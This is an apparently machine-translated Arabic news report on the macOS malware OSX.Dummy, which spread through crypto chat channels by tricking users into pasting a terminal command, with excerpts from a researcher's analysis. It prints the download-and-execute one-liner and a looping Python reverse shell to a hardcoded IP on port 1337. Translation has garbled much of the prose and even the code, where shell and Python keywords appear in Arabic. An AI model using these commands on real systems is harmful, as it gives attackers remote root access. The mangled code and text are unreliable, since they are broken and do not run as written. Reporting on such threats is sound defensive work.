البرمجيات الخبيثة حقا غبية يستهدف المشجعين cryptocurrency باستخدام أجهزة ماكينتوش

ميمييل أكبار من حرب النجوم يقول إنه فخ.EnlargeLucasfilm

شخص ينتحل مسؤولي cryptocurrency المرتبطة قنوات النقاش على Slack و Discord والمراسلات الاجتماعية الأخرى تحاول الأنظمة الأساسية جذب الآخرين إلى تثبيت نظام التشغيل MacOS البرمجيات الخبيثة. تتكون حملة الهندسة الاجتماعية من نشر أ النصي في المناقشات وتشجيع الناس على نسخ ولصق ذلك النصي في نافذة المحطة الطرفية على أجهزة ماكينتوش الخاصة بهم. ينزل الأمر ملف ضخم (34 ميجابايت) وينفذه ، وإنشاء جهاز تحكم عن بعد الاتصال الذي يعمل بمثابة مستتر للمهاجم.

قام Patrick Wardle ، وهو خبير في برامج Mac ، بفحص البرامج الضارة وأطلق عليها اسم “OSX.Dummy” لأنه ، كما كتب:

  • طريقة العدوى غبية
  • الحجم الهائل للثنائي هو البكم
  • آلية الثبات عرجاء (وبالتالي غبية)
  • القدرات محدودة نوعا ما (وبالتالي غبية)
  • من السهولة اكتشافه في كل خطوة (غبية)
  • … وأخيرًا ، يحفظ البرنامج الضار كلمة مرور المستخدم dumpdummy

الهجوم ، الذي لاحظه أولاً رمكو فيرهوف من SANS اليوم ، يقوم بتنزيل الحمولة الصعبة من خادم بعيد ، مما يجعل هذا الملف قابل للتنفيذ ، ويديرها. يبدو شيء مثل هذا:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

يحمل الوحش الثنائي معه مجموعة من المكتبات ، بما في ذلك فتح مكتبات SSL لتشفير اتصالاتها مرة أخرى الخادم — نظام يعمل في مركز بيانات الاستضافة مزود CrownCloud. بمجرد تنفيذه ، يستخدم الأمر suفعل جعل نفسه مملوكة من قبل المستخدم الجذر ماك. من أجل هذا ل يحدث ، يجب على الضحية إدخال كلمة مرور للسماح للبرنامج النصي استمر. يخزن البرنامج النصي كلمة المرور هذه في ملف مؤقت دعا “dumpdummy”. يصدر البرنامج النصي أيضًا أوامر لإضافة نفسه إلى قائمة بدء التشغيل لنظام التشغيل MacOS – مما يجعلها مستمرة.

رمز الباب الخلفي للنص ، كما لاحظ وارد ، هو تكراري استدعاء سطر الأوامر Python مع عنوان IP الثابت ترميز ل اتصال يستخدم المنفذ 1337 – نكتة leetspeak واضحة.

#! / بن / سحق

في حين :

do

python -c ‘import socket، subprocess، os؛ الصورة = socket.socket (socket.AF_INET، socket.SOCK_STREAM)؛ s.connect (( “185.243.115.230”، 1337))؛ os.dup2 (s.fileno ()، 0)؛ os.dup2 (s.fileno ()، 1)؛ os.dup2 (s.fileno ()، 2)؛ ع = subprocess.call ([ “/ بن / ش”، “- ط”])؛ ”

النوم 5

فعله

نية المهاجم ليست واضحة بعد. ولكن لأن كل هذا ينفذ من خلال نافذة المحطة الطرفية ، فإنه يتجاوز برنامج GateKeeper الخاص بـ MacOS حماية البرامج الضارة ، على الرغم من كونها غير موقعة. ويعطي المهاجم القدرة على تنفيذ رمز سطر الأوامر كمستخدم الجذر على أجهزة ماكينتوش المصابة. بالطبع ، يجب على الكود التغلب على المشترك شعور الضحية كذلك.

Like this post? Please share to your friends:
Leave a Reply

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: